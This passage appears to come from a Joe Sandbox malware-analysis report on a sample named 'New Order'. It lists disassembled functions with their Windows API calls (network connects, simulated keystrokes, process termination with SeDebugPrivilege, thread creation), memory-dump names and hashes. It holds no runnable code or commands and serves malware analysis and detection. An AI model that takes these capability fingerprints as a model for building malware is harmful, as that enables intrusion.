_free.LIBCMT ref: 002FCF71
_free.LIBCMT ref: 002FCFA9
_free.LIBCMT ref: 002FCFDA
_free.LIBCMT ref: 002FD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 002FD09C
_free.LIBCMT ref: 002FD0B5

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: aa3d574697a327d43dbe6031be82f1b879ed105a5198f6fd32af80b1c0571d30
Instruction ID: 73a2db472aad38368f03994ed7853d1f389b00e758b5be5899114ee2e3a0a355
Opcode Fuzzy Hash: aa3d574697a327d43dbe6031be82f1b879ed105a5198f6fd32af80b1c0571d30
Instruction Fuzzy Hash: 35614C7192430EAFDB25AFB49981A79FB99DF013D0F24027FFB4597281D6329D208B90

Function 003550D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00355186
ShowWindow.USER32(?,00000000), ref: 003551C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 003551CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 003551D1

Part of subcall function 00356FBA: DeleteObject.GDI32(00000000), ref: 00356FE6

GetWindowLongW.USER32(?,000000F0), ref: 0035520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0035521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0035524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00355287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00355296

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 30287c9c7316fc9374e9b4b741330ff5984d999798366c7a7f9ede3774ee7f32
Instruction ID: c1d8830af9e375ec5d9b65296b88496b893b43f610cc1ef22d652e6b17c18cfb
Opcode Fuzzy Hash: 30287c9c7316fc9374e9b4b741330ff5984d999798366c7a7f9ede3774ee7f32
Instruction Fuzzy Hash: C851B230A50A08BEEF229F24CC55F987BB9EB05326F144412FD159A6F0C775BA98DF41

Function 002D8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00316890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 003168A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003168B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 003168D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003168F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002D8874,00000000,00000000,00000000,000000FF,00000000), ref: 00316901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0031691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002D8874,00000000,00000000,00000000,000000FF,00000000), ref: 0031692D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 7d9b0e6500fd7cd17e6639de4f1ded97772e44a5c96b02c505a76622a870387e
Instruction ID: a798a5d40205c7bf7d93bcb988341583d5051b4b74c931a94eb6b865d5557669
Opcode Fuzzy Hash: 7d9b0e6500fd7cd17e6639de4f1ded97772e44a5c96b02c505a76622a870387e
Instruction Fuzzy Hash: 3751AB70620305AFDB25CF64CC92FAA7BB9EB48314F10451AF912D72A0DB70EDA0DB40

Function 0033C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0033C182
GetLastError.KERNEL32 ref: 0033C195
SetEvent.KERNEL32(?), ref: 0033C1A9

Part of subcall function 0033C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0033C272
Part of subcall function 0033C253: GetLastError.KERNEL32 ref: 0033C322
Part of subcall function 0033C253: SetEvent.KERNEL32(?), ref: 0033C336
Part of subcall function 0033C253: InternetCloseHandle.WININET(00000000), ref: 0033C341

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 9e43cfccd1c75adb3fa91047cb756d02b92ed3860bbc4480ca02becba9161487
Instruction ID: 53b748a4c8cf04bbc809f6fa52a52af0c35f8ff4fd1f9889e461f491834a3126
Opcode Fuzzy Hash: 9e43cfccd1c75adb3fa91047cb756d02b92ed3860bbc4480ca02becba9161487
Instruction Fuzzy Hash: 64318B71620705AFDB229FA59C84A67BBECFF18305F05681DF956E6620D730E810EB60

Function 003225A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00323A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00323A57
Part of subcall function 00323A3D: GetCurrentThreadId.KERNEL32 ref: 00323A5E
Part of subcall function 00323A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003225B3), ref: 00323A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 003225BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003225DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003225DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 003225E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00322601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00322605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0032260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00322623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00322627

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 180bb3b8a885eb74319c42748fb54e1eede1ad3d7d19aae43638d4d4171130af
Instruction ID: eb57d17dd575ebda7872d945dc76826dca1626869758c1e32708b4de73a44dd8
Opcode Fuzzy Hash: 180bb3b8a885eb74319c42748fb54e1eede1ad3d7d19aae43638d4d4171130af
Instruction Fuzzy Hash: DE01D831390720BBFB1167689C8AF597F9DDB4EB16F101011F354AE1E1C9E115448A6A

Function 00321803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00321449,?,?,00000000), ref: 0032180C
HeapAlloc.KERNEL32(00000000,?,00321449,?,?,00000000), ref: 00321813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00321449,?,?,00000000), ref: 00321828
GetCurrentProcess.KERNEL32(?,00000000,?,00321449,?,?,00000000), ref: 00321830
DuplicateHandle.KERNEL32(00000000,?,00321449,?,?,00000000), ref: 00321833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00321449,?,?,00000000), ref: 00321843
GetCurrentProcess.KERNEL32(00321449,00000000,?,00321449,?,?,00000000), ref: 0032184B
DuplicateHandle.KERNEL32(00000000,?,00321449,?,?,00000000), ref: 0032184E
CreateThread.KERNEL32(00000000,00000000,00321874,00000000,00000000,00000000), ref: 00321868

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 7cc6429528fbdaee190461d375135cbe871bce727b2e36edc7c195fe0b673260
Instruction ID: 8e1098ebd3110647a71eab9125ec94b3b38773666ac552f34d29b597ec4b9932
Opcode Fuzzy Hash: 7cc6429528fbdaee190461d375135cbe871bce727b2e36edc7c195fe0b673260
Instruction Fuzzy Hash: 7401CDB5650708BFE711AFB5DC4DF6B3BACEB89B15F005411FA05DB1A1CA749940CB60

Function 0034A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0032D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0032D501
Part of subcall function 0032D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0032D50F
Part of subcall function 0032D4DC: CloseHandle.KERNEL32(00000000), ref: 0032D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0034A16D
GetLastError.KERNEL32 ref: 0034A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0034A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0034A268
GetLastError.KERNEL32(00000000), ref: 0034A273
CloseHandle.KERNEL32(00000000), ref: 0034A2C4

Strings

SeDebugPrivilege, xrefs: 0034A18F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: c164d0558320ad1ff66c2477503c3f84fe219d1b2b9b1a54d2690022b3f12f6a
Instruction ID: ddd271aabf5d4652256e11ee0d295eb9c7cb7f60a5562658546c42338f2d29d9
Opcode Fuzzy Hash: c164d0558320ad1ff66c2477503c3f84fe219d1b2b9b1a54d2690022b3f12f6a
Instruction Fuzzy Hash: 7C618B302586429FD721DF14C494F1ABBE5AF44318F19848CE4668FBA3C7B6ED45CB92

Function 00353886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00353925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0035393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00353954
_wcslen.LIBCMT ref: 00353999
SendMessageW.USER32(?,00001057,00000000,?), ref: 003539C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 003539F4

Strings

SysListView32, xrefs: 003538F7

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: f2753ac23ae685597a456cf294db23520a77b2a792e353d1477676fbb47e18c5
Instruction ID: d8b2630e1ddf65a7e158fe74e0c2f419ddb93a788e43c97c0f3498cfe56ba5b8
Opcode Fuzzy Hash: f2753ac23ae685597a456cf294db23520a77b2a792e353d1477676fbb47e18c5
Instruction Fuzzy Hash: 5841E671A00309ABEF229F64CC45FEA77A9EF08395F110526F954E7291D771DE88CB90

Function 0032BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0032BCFD
IsMenu.USER32(00000000), ref: 0032BD1D
CreatePopupMenu.USER32 ref: 0032BD53
GetMenuItemCount.USER32(015B66C0), ref: 0032BDA4
InsertMenuItemW.USER32(015B66C0,?,00000001,00000030), ref: 0032BDCC

Strings

2, xrefs: 0032BD37
0, xrefs: 0032BCA8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 9e40d0b0711f87a09dd4ec43812afa5957a31371cc31d024f72e35c2152cfb1c
Instruction ID: 3d4d5f75145e02b14490820643a02c0345927060aa7fd334bc7a228db629d41f
Opcode Fuzzy Hash: 9e40d0b0711f87a09dd4ec43812afa5957a31371cc31d024f72e35c2152cfb1c
Instruction Fuzzy Hash: 1451DD70A00325DBDF12CFA9E888BEEFBF8BF45314F148519E4519B2A0E7709941CB61

Function 002E2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 002E2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 002E2D53
_ValidateLocalCookies.LIBCMT ref: 002E2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 002E2E0C
_ValidateLocalCookies.LIBCMT ref: 002E2E61

Strings

csm, xrefs: 002E2DF6
&H., xrefs: 002E2DFE, 002E2E07, 002E2E18

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &H.$csm
API String ID: 1170836740-2665543163
Opcode ID: 020b1cfdeef490f9aeb7f10ae98d971cf64f64b41930ec7ff33296bd89bb0e4e
Instruction ID: e97c541d05e24f6d28f59afde37c4d17e84f324c1b98492c8ff76e5850ed37b0
Opcode Fuzzy Hash: 020b1cfdeef490f9aeb7f10ae98d971cf64f64b41930ec7ff33296bd89bb0e4e
Instruction Fuzzy Hash: 6B412630E60249DBCF10DF2ACC45A9EBBB8BF40314F548055E9166B392C771EA29CF90

Function 0032C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0032C913

Strings

question, xrefs: 0032C8CC
warning, xrefs: 0032C8FC
stop, xrefs: 0032C8E4
blank, xrefs: 0032C895
info, xrefs: 0032C8B4

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 4472456088ced5e9b7e3cc9563389cd4664ccdd5d7009405a4e92b8e1afa0da8
Instruction ID: a6c205e599deab431ab9447ff8625f8ecf37fc860d596ad77beff4562851ebd9
Opcode Fuzzy Hash: 4472456088ced5e9b7e3cc9563389cd4664ccdd5d7009405a4e92b8e1afa0da8
Instruction Fuzzy Hash: 35113D316A9316BEE7036B55BC83CEE279CDF15724B60103AF904A6282D7B05E4057A8

Function 0032ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0032ED2A
_wcslen.LIBCMT ref: 0032ED3B
_wcslen.LIBCMT ref: 0032ED79
_wcslen.LIBCMT ref: 0032EDAF
_wcslen.LIBCMT ref: 0032EDDF
_wcslen.LIBCMT ref: 0032EDEF
_wcslen.LIBCMT ref: 0032EE2B
_wcslen.LIBCMT ref: 0032EE5A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: eabc08875bc094e0afe287c7e755afb5917cb55917fcc4f45cdb54d2056188e8
Instruction ID: 6f22f88945c1b322344affbae7257e0258d09fc93f8e8f5257f4491965129877
Opcode Fuzzy Hash: eabc08875bc094e0afe287c7e755afb5917cb55917fcc4f45cdb54d2056188e8
Instruction Fuzzy Hash: 7941A565C6025875CB12EBF5988A9CF77A8AF45310F904463EA14F3122FB34D265C7E5

Function 002DF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0031682C,00000004,00000000,00000000), ref: 002DF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0031682C,00000004,00000000,00000000), ref: 0031F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0031682C,00000004,00000000,00000000), ref: 0031F454

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 6ed5401d3a63b985d6b6391c056da365c61570843983252e4b8375390bef1fff
Instruction ID: 5b2de08ba1214ac5bb2dc7e1c1dd880d745b58fc64490a0334bed4fdaee8656c
Opcode Fuzzy Hash: 6ed5401d3a63b985d6b6391c056da365c61570843983252e4b8375390bef1fff
Instruction Fuzzy Hash: 68412D309387C1BEC7BA8F298AA87E67B95AB4A314F14443EE04756770D7729CD0CB15

Function 00352D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00352D1B
GetDC.USER32(00000000), ref: 00352D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00352D2E
ReleaseDC.USER32(00000000,00000000), ref: 00352D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00352D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00352D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00355A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00352DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00352DE1

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 8855192013e81a9e13fc1b57987a46ebfb1b1889e1ed2795694a1296baf1c138
Instruction ID: d709a8cb55956bb70ece8009dc6ded60e60dcf46fe0ba61cc6c85fbebb2346c3
Opcode Fuzzy Hash: 8855192013e81a9e13fc1b57987a46ebfb1b1889e1ed2795694a1296baf1c138
Instruction Fuzzy Hash: CC317F72211314BFEB124F50CC8AFEB7BADEF0A716F044055FE089A2A1C6759C50CBA4

Function 00325622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00325637
_memcmp.LIBVCRUNTIME ref: 00325659
_memcmp.LIBVCRUNTIME ref: 00325671
_memcmp.LIBVCRUNTIME ref: 00325684
_memcmp.LIBVCRUNTIME ref: 0032569E
_memcmp.LIBVCRUNTIME ref: 003256B1
_memcmp.LIBVCRUNTIME ref: 003256C9
_memcmp.LIBVCRUNTIME ref: 003256E4

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: cbd444108bc5b5ccf5ff0f4af88f85ba014c258961178e076f0a50c4cdf66210
Instruction ID: b94bd4f8c0182095c8d21ed26ba0bd6a0fd4eeee2197c957ebd0abd226317b94
Opcode Fuzzy Hash: cbd444108bc5b5ccf5ff0f4af88f85ba014c258961178e076f0a50c4cdf66210
Instruction Fuzzy Hash: EE21DB71B91A697BD2179521AE82FFB335CAF20386F840030FD049AA85F731EF3485A5

Function 00344FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0034502E, 00345383
Not an Object type, xrefs: 00345007

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 6f3021f09a36392273bceb31a80fb577e2fa873166a0d091702c4a5866004046
Instruction ID: 7f5398d630e9215640ce5c103419d93eb5cb41559e395154fe4443849ce8c1bc
